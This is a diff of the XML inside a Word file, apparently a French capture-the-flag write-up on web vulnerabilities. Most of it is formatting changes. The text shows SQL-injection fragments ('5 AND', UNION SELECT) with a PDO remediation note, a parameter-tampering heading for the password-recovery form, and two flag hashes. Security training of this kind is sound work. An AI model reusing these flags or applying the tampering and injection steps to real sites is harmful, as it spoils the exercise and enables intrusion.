+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD7C08" wp14:editId="68E326DA">
+            <wp:extent cx="2990850" cy="1771650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2078591015" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2078591015" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId50"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2990850" cy="1771650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId45"/>
+      <w:footerReference w:type="default" r:id="rId51"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -4065,8 +5842,35 @@
         <w:bCs/>
       </w:rPr>
       <w:tab/>
-      <w:t>Lab WebEX</w:t>
     </w:r>
+    <w:proofErr w:type="spellStart"/>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:t>Lab</w:t>
+    </w:r>
+    <w:proofErr w:type="spellEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:t xml:space="preserve"> </w:t>
+    </w:r>
+    <w:proofErr w:type="spellStart"/>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:t>WebEX</w:t>
+    </w:r>
+    <w:proofErr w:type="spellEnd"/>
     <w:r>
       <w:rPr>
         <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -6725,7 +8529,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="007B60E1"/>
+    <w:rsid w:val="00EF684D"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Titre1">
     <w:name w:val="heading 1"/>
@@ -6928,7 +8732,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableauNormal">

--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -9,17 +9,17 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
+          <w:sz w:val="96"/>
+          <w:szCs w:val="96"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="96"/>
+          <w:szCs w:val="96"/>
         </w:rPr>
         <w:t xml:space="preserve">LAB </w:t>
       </w:r>
@@ -29,8 +29,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="40"/>
-          <w:szCs w:val="40"/>
+          <w:sz w:val="96"/>
+          <w:szCs w:val="96"/>
         </w:rPr>
         <w:t>WebEX</w:t>
       </w:r>
@@ -124,10 +124,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="581E5007" wp14:editId="5C67E7ED">
-            <wp:extent cx="5760720" cy="2603500"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
-            <wp:docPr id="1900117052" name="Image 1" descr="Webex By Cisco's Logo | Hybrid Work"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5D1FC0" wp14:editId="67F98133">
+            <wp:extent cx="5760720" cy="2319655"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="601881613" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -135,36 +135,23 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="Webex By Cisco's Logo | Hybrid Work"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="601881613" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="2603500"/>
+                      <a:ext cx="5760720" cy="2319655"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -211,7 +198,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
@@ -235,18 +221,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -362,6 +336,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> : 1.0  </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2807,26 +2789,65 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A42BAB4" wp14:editId="509570C9">
+            <wp:extent cx="3544673" cy="4276725"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1041279352" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, nombre&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1041279352" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, nombre&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3546707" cy="4279179"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
           <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5908C424" wp14:editId="2B4C331C">
             <wp:extent cx="5591175" cy="2235360"/>
@@ -2843,7 +2864,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3031,6 +3052,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Nettoyage des données (Output </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -3319,7 +3341,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId30" w:history="1">
+      <w:hyperlink r:id="rId31" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3372,7 +3394,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B112CDC" wp14:editId="190BF507">
             <wp:extent cx="4232450" cy="2179675"/>
@@ -3389,7 +3410,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3439,7 +3460,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId32" w:history="1">
+      <w:hyperlink r:id="rId33" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3468,6 +3489,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -3558,7 +3580,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3586,7 +3608,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3623,7 +3645,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3707,7 +3729,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3800,7 +3822,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3913,7 +3935,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId38" w:history="1">
+      <w:hyperlink r:id="rId39" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -3951,7 +3973,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId39"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4047,7 +4069,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4079,6 +4101,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">5 AND </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -4151,7 +4174,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4283,7 +4306,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId43"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4361,7 +4384,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
+                    <a:blip r:embed="rId44"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4451,7 +4474,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4525,7 +4548,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44"/>
+                    <a:blip r:embed="rId45"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4709,14 +4732,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve"> C'est la solution ultime. En utilisant PDO, nous séparons la structure de la requête SQL des données. Le </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>moteur SQL compile la requête d'abord, puis insère les données comme de simples paramètres. Même si l'utilisateur tape UNION SELECT, cela sera traité comme une simple chaîne de caractères et non comme une instruction.</w:t>
+        <w:t xml:space="preserve"> C'est la solution ultime. En utilisant PDO, nous séparons la structure de la requête SQL des données. Le moteur SQL compile la requête d'abord, puis insère les données comme de simples paramètres. Même si l'utilisateur tape UNION SELECT, cela sera traité comme une simple chaîne de caractères et non comme une instruction.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4994,7 +5010,7 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>R</w:t>
+        <w:t>Recover_</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5003,8 +5019,9 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>ecover_</w:t>
-      </w:r>
+        <w:t>submit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5012,7 +5029,17 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>submit</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Parameter</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5022,7 +5049,7 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5032,7 +5059,7 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>Parameter</w:t>
+        <w:t>Tampering</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5042,68 +5069,80 @@
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Depuis la page de login en faisant « </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>forgot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Tampering</w:t>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>my</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
-        </w:rPr>
-        <w:t>1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>Depuis la page de login en faisant « </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="EE0000"/>
         </w:rPr>
-        <w:t xml:space="preserve">I </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5111,7 +5150,7 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="EE0000"/>
         </w:rPr>
-        <w:t>forgot</w:t>
+        <w:t>password</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -5119,38 +5158,6 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="EE0000"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>my</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
         <w:t> </w:t>
       </w:r>
       <w:r>
@@ -5159,7 +5166,7 @@
         </w:rPr>
         <w:t xml:space="preserve">» on arrive sur la page </w:t>
       </w:r>
-      <w:hyperlink r:id="rId45" w:history="1">
+      <w:hyperlink r:id="rId46" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -5184,6 +5191,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3742E0CA" wp14:editId="7F41539B">
             <wp:extent cx="2543175" cy="1584173"/>
@@ -5200,7 +5208,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId46"/>
+                    <a:blip r:embed="rId47"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5242,15 +5250,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>webmaster@borntosec.com</w:t>
+        <w:t xml:space="preserve"> webmaster@borntosec.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5283,7 +5283,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId47"/>
+                    <a:blip r:embed="rId48"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5345,7 +5345,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> » par </w:t>
       </w:r>
-      <w:hyperlink r:id="rId48" w:history="1">
+      <w:hyperlink r:id="rId49" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
@@ -5391,7 +5391,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId49"/>
+                    <a:blip r:embed="rId50"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5478,60 +5478,106 @@
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
+        </w:rPr>
+        <w:t>b3a6e43ddf8b4bbb4125e5e7d23040433827759d4de1c04ea63907479a80a6b2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
